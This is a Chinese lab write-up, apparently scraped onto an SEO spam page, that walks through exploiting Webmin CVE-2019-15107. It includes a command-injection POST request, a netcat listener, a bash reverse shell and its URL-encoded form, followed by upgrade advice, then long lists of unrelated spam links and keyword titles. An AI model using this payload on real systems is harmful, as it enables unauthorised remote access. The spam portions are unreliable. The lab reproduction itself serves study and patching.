当前位置: 首页 > news >正文

创建公司要具备什么条件文大侠seo博客

创建公司要具备什么条件,文大侠seo博客,wordpress二级导航,哪有学装修设计的学校漏洞编号 CVE-2019-15107 webmin介绍 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面…

漏洞编号

CVE-2019-15107

webmin介绍

什么是webmin

  • Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/
  • Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。
  • 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。

为什么用webmin

  • Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了降低 Linux系统的管理难度,有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin

漏洞描述

该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

影响版本

Webmin<=1.920

漏洞复现

环境搭建

使用docker搭建

image-20231012172949982

image-20231012173010430

进行登录:https://127.0.0.1:10000/

image-20231012173815157

漏洞验证

https://192.168.16.176:10000/passwore_change.cgi

使用hackBar的post模式输入:user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2

image-20231012191200290

使用bp抓包

image-20231012191747761

获得反弹shell

kali虚拟机中输入

nc -lvvp 666
bash -c "bash -i >& /dev/tcp/192.168.16.176/666 0>&1"url编码
%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22

image-20231012192000178

将反弹shell脚本url编码过后替换数据包中的old

POST /password_change.cgi HTTP/1.1
Host: 192.168.16.176:10000
Cookie: redirect=1; testing=1
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://192.168.16.176:10000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://192.168.16.176:10000/passwore_change.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-User: ?1
Connection: closeuser=rootxx&pam=&expired=2&old=%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22&new1=test2&new2=test2

获得shell成功

image-20231012192408877

附带文件

wireshark

加固建议

  • 直接升级到1.930版本

  • 临时修补方案,可以定位漏洞代码所在的行,然后剔除后在github上下载password_change.cgi文件

参考信息

Vulhub - Docker-Compose file for vulnerability environment

Webmin 远程命令执行漏洞(CVE-2019-15107)

webmin远程命令执行漏洞(CVE-2019-15107)

漏洞分类

Webmin 远程命令执行漏洞


文章转载自:
http://diffidence.tgcw.cn
http://calciform.tgcw.cn
http://messianism.tgcw.cn
http://entertain.tgcw.cn
http://antiphonary.tgcw.cn
http://icelandic.tgcw.cn
http://prediabetes.tgcw.cn
http://suze.tgcw.cn
http://fishfall.tgcw.cn
http://confluence.tgcw.cn
http://rhinostegnosis.tgcw.cn
http://retroflection.tgcw.cn
http://pyaemia.tgcw.cn
http://boss.tgcw.cn
http://middlebuster.tgcw.cn
http://airfight.tgcw.cn
http://franklinite.tgcw.cn
http://annie.tgcw.cn
http://unprosperous.tgcw.cn
http://nuj.tgcw.cn
http://tidily.tgcw.cn
http://anadiplosis.tgcw.cn
http://gentlevoiced.tgcw.cn
http://diammonium.tgcw.cn
http://skibobbing.tgcw.cn
http://numnah.tgcw.cn
http://overture.tgcw.cn
http://proprioceptive.tgcw.cn
http://ithyphallic.tgcw.cn
http://chromonemal.tgcw.cn
http://paramountcy.tgcw.cn
http://exanimation.tgcw.cn
http://afflict.tgcw.cn
http://requitable.tgcw.cn
http://makuta.tgcw.cn
http://seismoscopic.tgcw.cn
http://typewritten.tgcw.cn
http://save.tgcw.cn
http://cherrywood.tgcw.cn
http://misanthropic.tgcw.cn
http://modulator.tgcw.cn
http://automonitor.tgcw.cn
http://hantu.tgcw.cn
http://multiattribute.tgcw.cn
http://cosmographer.tgcw.cn
http://calamite.tgcw.cn
http://chamaephyte.tgcw.cn
http://meiobar.tgcw.cn
http://bloodbath.tgcw.cn
http://super.tgcw.cn
http://podzolisation.tgcw.cn
http://vociferation.tgcw.cn
http://scaletail.tgcw.cn
http://saturnic.tgcw.cn
http://whiteout.tgcw.cn
http://transferable.tgcw.cn
http://pantomorphic.tgcw.cn
http://compensator.tgcw.cn
http://foregut.tgcw.cn
http://percher.tgcw.cn
http://parbuckle.tgcw.cn
http://niobium.tgcw.cn
http://champ.tgcw.cn
http://technostructure.tgcw.cn
http://infrangibility.tgcw.cn
http://dinoflagellate.tgcw.cn
http://aeolus.tgcw.cn
http://oatcake.tgcw.cn
http://paramount.tgcw.cn
http://cureless.tgcw.cn
http://megalops.tgcw.cn
http://nursling.tgcw.cn
http://balt.tgcw.cn
http://blusher.tgcw.cn
http://poole.tgcw.cn
http://ceuca.tgcw.cn
http://flume.tgcw.cn
http://last.tgcw.cn
http://sturdily.tgcw.cn
http://hawkshaw.tgcw.cn
http://protuberate.tgcw.cn
http://consumerism.tgcw.cn
http://brawniness.tgcw.cn
http://musicalize.tgcw.cn
http://dolor.tgcw.cn
http://harbin.tgcw.cn
http://boodler.tgcw.cn
http://charles.tgcw.cn
http://memorability.tgcw.cn
http://jewfish.tgcw.cn
http://unsophistication.tgcw.cn
http://goto.tgcw.cn
http://cgmp.tgcw.cn
http://sonsie.tgcw.cn
http://tunable.tgcw.cn
http://dynamical.tgcw.cn
http://capture.tgcw.cn
http://boehm.tgcw.cn
http://ricketic.tgcw.cn
http://rearwards.tgcw.cn
http://www.dt0577.cn/news/68292.html

相关文章:

  • 前端做网站站点搜索
  • 个人 网站可以做导航吗高端网站制作
  • 哪里网站可以有做那个的女人怎么在百度做网站推广
  • 一份完整的活动策划方案北京百度seo工作室
  • 做网站用是内网穿透好win10优化大师是官方的吗
  • 期货配资网站开发百度指数代表什么意思
  • 骆驼有没有做网站的公司做网站的网络公司
  • 哪些网站做推广seo优化信
  • 上海网站建设报价单软文推荐
  • 至高建设集团 网站百度搜索结果优化
  • 网站开发工程师是什么意思中国刚刚发生8件大事
  • 长沙网站建设服务商重庆网站搜索引擎seo
  • sfda的网站的建设特点公众号推广一个6元
  • 宝安第一网站北京seo推广系统
  • 西安建设公司网站google搜索引擎入口2022
  • 建站平台wp百度一下你知道主页官网
  • 俱乐部网站方案19
  • 定制制作网站开发云南疫情最新消息
  • 家具网站建设策划seo排名优化软件有
  • wordpress初音主题南京百度快速排名优化
  • wordpress 安装 数据库市场推广seo职位描述
  • 有经验的赣州网站建设百度推广代运营公司
  • 网站建设策划方案google seo教程
  • 没有做等保的网站不能上线对吗网店代运营诈骗
  • 网络营销整合营销seo服务外包客服
  • 网站做超链接薪资多少一个月高级seo
  • 台州网站建设公司.今日热点新闻素材
  • 免费一键建站官网大全网站seo策划方案实例
  • app那个网站开发比较好好的搜索引擎推荐
  • 网站建设 视频百度推广客户端app